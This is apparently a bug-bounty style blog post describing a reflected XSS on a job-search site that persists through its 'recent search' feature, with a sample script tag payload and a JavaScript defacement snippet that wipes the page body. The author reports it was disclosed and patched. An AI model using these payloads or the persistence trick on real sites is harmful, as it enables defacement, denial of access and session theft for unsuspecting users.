RXSS leading to DOS
Hello everyone I recently started my hacking journey and I wanted to make a blog about some interesting hacking I did lately. In the end, there is video POC guys don’t miss it (the video is made after I successfully visited the malicious link). I will call the site x.com. The website is job finding platform. Ok so now, when I am finding vulnerabilities I am quickly looking for RXSS, and here this website had 3 pages, each with it’s own search engine. I quickly tested them, and I found the vulnerable one first actually, then I figured out that others were properly escaping the output))
This RXSS actually led to ATO(Account takeover) true cookie stealing, as the session cookie isn’t httpOnly, but I don’t want to talk about that scenario in here. As it’s a classic one, and I think you have heard of it as well.
Ok now back to RXSS, interesting thing was after I made page run alert by sending
?x=”><script>alert()</script><! —
I than suddenly by going back noticed that the alert popped up again. This means that if you are in vulnerable page, without trying hard, vulnerabilities may show up to you themselves.
Now what was that? well after simply inspecting I found out that the search had “recent search” future, which was containing my recent searches, and than a mind came up to me that first we can make people getting annoyed after visiting malicious link, and or fully disable access to that page by making JS delete all the html in x.com/lang/jobs. So for testing I quickly made up modify.js file wrote there smth like
document.body.removeAttribute(“class”);
document.body.style.fontSize=”unset”;
document.body.style.height=”100%”;
document.body.innerHTML=”<br/><br/><h1 align=center style=’color:green; font-size: 36px; font-weight: unset’>This page is hacked by Sevada797<br/>(Only who visits malicious link will get affected)</h1>”;document.body.style.backgroundColor=”black”
for POC I knew that I might not be able to recover from this, cause maybe page will break and I can’t find needed request to delete this from recent search, so I in advance only tested this when making the video.
And than, I ran the test, with payload link was
I also used %0D, as spaces where getting splited and my whole payload was getting embedded in spans each of them returning ‘keyword not found’.
And I also used <! — this as there were multiple reflections with their multiple same html elements, so I just commented them out.
Now consider if someone want’s to harm the company they could simply have their modify.js (empty) make lot’s of infected users by spreading malicious link, and then when they would like to lunch the attack they will paste the payload in .js.
I reported this to the company and they have made a patch.
Thanks for reading, let me know if this was interesting)
(Next write-up will be about how I found blind-SQL injection by manipulating url)
Follow me on Instagram https://instagram.com/sevada797
DM for collab.
Don’t forget to watch the cool video below 👇👇
